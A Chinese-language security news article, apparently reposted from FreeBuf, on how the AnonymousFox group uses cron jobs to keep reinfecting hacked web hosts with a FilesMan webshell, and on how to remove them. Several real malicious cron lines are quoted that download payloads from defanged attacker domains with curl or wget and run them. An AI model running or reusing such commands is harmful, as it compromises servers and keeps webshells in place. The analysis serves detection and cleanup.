黑客组织AnonymousFox 在新攻击中使用定时任务

admin 2022年4月11日23:45:27安全新闻评论32 views1568字阅读5分13秒阅读模式

最近,安全研究人员发现 AnonymousFox 在攻击中使用新的定时任务。本文将会介绍其中一个恶意定时任务,讲解其功能以及如何进行识别与删除。

 什么是定时任务 

cron 是 Linux 环境的定时任务,很多服务器都是运行在 Linux 上的,管理人员经常使用定时任务执行的软件更新与执行备份等任务。

黑客组织AnonymousFox 在新攻击中使用定时任务

cPanel 界面

攻击者也可以滥用定时任务从第三方服务器下载恶意样本。

 感染 

近年来,AnonymousFox 使用了很多种方法来进行持久化感染,避免被简单清除。例如,其恶意进程会不断重新感染,直到被终止。

黑客组织AnonymousFox 在新攻击中使用定时任务

进程信息

再例如,通过 .htaccess禁止执行除了恶意脚本外的 PHP 脚本。

黑客组织AnonymousFox 在新攻击中使用定时任务

禁止执行

攻击者会将数千个恶意文件写入失陷主机中,这不仅会干扰网站的正常运行(比如拦截用户访问控制面板),还会使清除这些恶意脚本变得非常困难。

恶意的定时任务在后台秘密执行,与恶意的 PHP 脚本配合着感染整个主机,脚本会不断重新感染受害者的定时任务。例如:

黑客组织AnonymousFox 在新攻击中使用定时任务

部分代码

这种方法与近年来的挖矿恶意软件其实没什么区别。

 定时任务分析 

以 */10 * * * * curl -so gojj hxxp://golang666[.]xyz/css[.]index && /bin/sh gojj /home/[REDACTED]/public_html/[REDACTED] && rm -f gojj为例,使用 curl 下载恶意样本(AnonymousFox Webshell):

黑客组织AnonymousFox 在新攻击中使用定时任务

部分代码

写入 ./css/index.php文件中。

处理后是一个经典的 FilesMan Webshell:

黑客组织AnonymousFox 在新攻击中使用定时任务

部分代码

不删除定时任务的情况下,主机会反复重新感染。删除恶意脚本前,一定要首先清除定时任务。

攻击者会非常频繁地更换 Payload 部署的地址,每次研究人员跟进调查的时候往往都已经被删除了。发现的部分定时任务:

*/15 * * * * wget -q -O xxxd hxxp://hello[.]ok2345678[.]xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/[REDACTED]/public_html 24 && rm -f xxxd*/10 * * * * curl -so gojj hxxp://golang666[.]xyz/css[.]index && /bin/sh gojj /home/[REDACTED]/public_html/[REDACTED] && rm -f gojj* * * * * wget -q -O xxxd5 hxxp://tasks[.]ptfish[.]top/xxxd5 && chmod 0755 xxxd5 && /bin/sh xxxd5 /home/[REDACTED]/public_html && rm -f xxxd5*/22 * * * * wget hxxp://hello[.]turnedpro[.]xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home4/[REDACTED]/[REDACTED] c233 && rm -f xxxd* * * * * wget -q -O xxxd hxxp://hello[.]hahaha666[.]xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/[REDACTED]/public_html 24 && rm -f xxxd

这些定时任务的目的都是相同的,重新感染主机阻碍恶意软件清除过程。

 总结 

AnonymousFox 是非常常见的恶意软件,其攻击具有侵略性和持续性,必须认真清理才能防止其卷土重来。

参考来源

https://blog.sucuri.net/2022/03/new-wave-of-anonymousfox-cron-jobs.html

黑客组织AnonymousFox 在新攻击中使用定时任务



精彩推荐






黑客组织AnonymousFox 在新攻击中使用定时任务

黑客组织AnonymousFox 在新攻击中使用定时任务
黑客组织AnonymousFox 在新攻击中使用定时任务
黑客组织AnonymousFox 在新攻击中使用定时任务

原文始发于微信公众号(FreeBuf):黑客组织AnonymousFox 在新攻击中使用定时任务

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月11日23:45:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  黑客组织AnonymousFox 在新攻击中使用定时任务 http://cn-sec.com/archives/899483.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: